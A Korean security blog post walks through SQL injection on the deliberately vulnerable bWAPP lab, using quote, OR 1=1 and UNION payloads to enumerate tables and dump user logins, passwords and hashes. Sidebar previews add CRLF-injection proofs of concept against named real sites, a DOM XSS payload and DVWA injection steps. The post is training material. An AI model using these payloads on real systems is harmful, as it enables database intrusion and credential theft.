기본 콘텐츠로 건너뛰기

bWAPP SQL Injection [ GET/Search ]



bWAPP SQL Injection [ GET/Search ] Current : low




Search 를 클릭하여 패킷을 잡고 Request 값을 분석합니다.


위와 같이 title 변수를 사용하여 값을 전달합니다.


위 주소를 보면 GET 방식으로 title , Search 변수를 노출시킵니다.

따라서 , URL 부분을 통해 SQL 을 시도하는 방법과 텍스트 폼에 SQL 구문을 넣어 시도할수있습니다.



위와 같이 텍스트 폼에 ' 를 넣어 SQL 구문 오류가 발생하는지 취약점을 진단합니다.

이번엔 ' or 1=1# Login SQL 구문을 넣어 아래와 같이 취약점을 진단합니다.



진단 결과 위와 같이 여러 사용자의 이름 및 정보들이 출력됩니다.



이번엔 UNION구문을 통해 SQL 취약점을 진단합니다. 

'UNION ALL SELECT 1,2,3,4,5,6,7# 를 통해 칼럼길이 를 적절히 맞추어 UNION SQL 을 시도합니다.



진단 결과 여러 사용자의 정보들이 출력됩니다.


이번엔 UNION SQL 구문의 명령어인 @@version 을 통해 버전 정보를 확인합니다. 


확인 결과 아래와 같이 Ubuntu 버전이 출력된 것을 확인이 가능합니다.


이번엔 table_name SQL 구문을 통해 테이블명을 아래와 같이 뽑아냅니다.





테이블명을 뽑아낸 결과 위와 같이 user 테이블의 사용자가 확인이 가능합니다.

 

이를 통해 위에서 뽑아낸 user 테이블 명에 대해 where 구문을 추가하여 users 사용자에 대한 추가 정보를 아래와 같이 추가적으로 획득합니다. 



이번엔 , column_name 을 통해 여러 사용자의 정보들을 획득합니다.  





위와 같이 column 구문을 통해  id , login , password , email , secret 등 다양한 정보를 추가적으로 획득이 가능합니다.

아래와 같이 concat 을 통해 문자열을 합쳐 여러 사용자에 대해 정보를 조회합니다.




이번엔 concat 을 사용하지 않고 여러 사용자의 정보를 조회합니다.

조회 결과 아래와 같이  사용자의 password , secret 등 각종 정보와 Hash 값으로 추측되는 정보까지 획득이 가능합니다. 



취득한 위 Hash 값은 John the Ripper 툴 및 SHA256 패스워드 복호화 툴을 통해 Hash 함수 해독이 가능합니다.



댓글

댓글 쓰기

이 블로그의 인기 게시물

HackerOne Vulnerability Analysis 1

이 문서는  HackerOne 에서  제출된 많은 보고서들을 토대로 핵심 Payload만 요약하여 직접 작성하였습니다. Link :  https://hackerone.com/ Vulnerabilities list 1. CRLF Injection 2. Open Redirection  3. Cross-Site-Scripting 4. SQL-Injection 5. Path Traversal  CRLF Injection PoC http://www.myshopify.com/xxcrlftest%0aSet-Cookie:test=test3;domain=.myshopify.com; https://www.blackfan.myshopify.com/xxx%0aSet-Cookie:test=test2;domain=.myshopify.com; HTTP Response: HTTP/1.1 302 Moved Temporarily ... Location: http://myshopify.com/xxcrlftest Set-Cookie:test=test;domain=.myshopify.com; PoC: https://engineeringblog.yelp.com/xxcrlftest%0d%0aSet-Cookie:%20test=test;domain=.yelp.com HTTP Response: HTTP/1.1 301 Moved Permanently ... Location: http://engineeringblog.yelp.com/xxcrlftest Set-Cookie: test=test;domain=.yelp.com PoC (Chrome, Internet Explorer) http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; HTTP Resp...
댓글 쓰기
자세한 내용 보기

Juice Shop XSS [ Dom based XSS ]

Juice Shop XSS [ Dom based XSS ] Search 입력란에 악성 스크립트를 넣어 XSS 취약점을 진단합니다. Payload :  <iframe src="javascript:alert(`xss`)">   다음과 같이 이는 < , > 는 &lt; , &gt; 로 특수문자를 필터링하지 않기에 XSS 에 취약합니다.
댓글 쓰기
자세한 내용 보기

DVWA SQL Injection

DVWA  SQL Injection low [그림 1] Summary [그림1] 는 SQLInjection 공격을 시도해 볼 수 있도록 개발된 폼을 제공하고 있습니다 Description [그림 1] 은 ' , # , -- ,= 등 SQLInjection 에 취약한 특수문자등을 필터링하지 않아 SQL주입이 가능합니다. Steps to reproduce ORDER BY Query 1' order by 1,2# User ID:    ID: 1' ORDER BY 1,2# First name: admin Surname: admin UNION Query ' UNION SELECT 1,@@version#  User ID:    ID: 1' UNION SELECT 1,version()# First name: admin Surname: admin ID: 1' UNION SELECT 1,version()# First name: 1 Surname: 10.4.8-MariaDB ' UNION ALL SELECT 1,column_name from information_schema.columns# User ID:    ID: ' UNION ALL SELECT 1,column_name from information_schema.columns# First name: 1 Surname: user_id ID: ' UNION ALL SELECT 1,column_name from information_schema.columns# First name: 1 Surname: first_name ID: ' UNION ALL SELECT 1,column_name from information_schema.columns# First name: 1 Surname: last_name ID: ' UNION ALL SELECT 1,column_name from in...
댓글 쓰기
자세한 내용 보기